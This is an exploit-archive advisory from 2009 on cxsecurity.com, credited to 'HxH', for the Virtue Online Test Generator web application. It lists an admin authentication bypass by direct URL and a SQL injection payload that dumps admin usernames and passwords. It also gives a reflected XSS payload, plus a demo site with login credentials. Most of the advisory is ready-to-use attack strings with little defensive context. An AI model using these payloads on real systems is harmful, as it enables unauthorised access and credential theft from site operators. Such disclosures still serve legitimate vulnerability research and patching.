Virtue Online Test Generator (AB/SQL/XSS) Multiple Vulnerabilities

2009.07.11
Credit: HxH
Risk: High
Local: No
Remote: Yes

+===================================================================================+ | | | Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities | | | +===================================================================================+ | | | Author.: HxH | | Contact: HxH[at]live[dot]at | | | +===================================================================================+ | | | Script.: Virtue Online Test Generator | | Home...: http://www.virtuenetz.com/virtue_test_generator.php | | | +-----------------------------------------------------------------------------------+ | | | Exploit: After user login | | | | [+] Auth Bypass | | | | http://[website]/[script]/admin/index.php | | | | [+] SQLi | | | | http://[website]/[script]/text.php?tid=[SQL] | | | | [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- | | | | [+] XSS | | | | http://[website]/[script]/text.php?tid=<script>alert(1)</script> | | | +-----------------------------------------------------------------------------------+ | | | Demo...: http://www.virtuenetz.com/exam | | Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo | | | +===================================================================================+ | | | Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist | | | +===================================================================================+

Referencje:

http://xforce.iss.net/xforce/xfdb/51388
http://www.milw0rm.com/exploits/9022


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top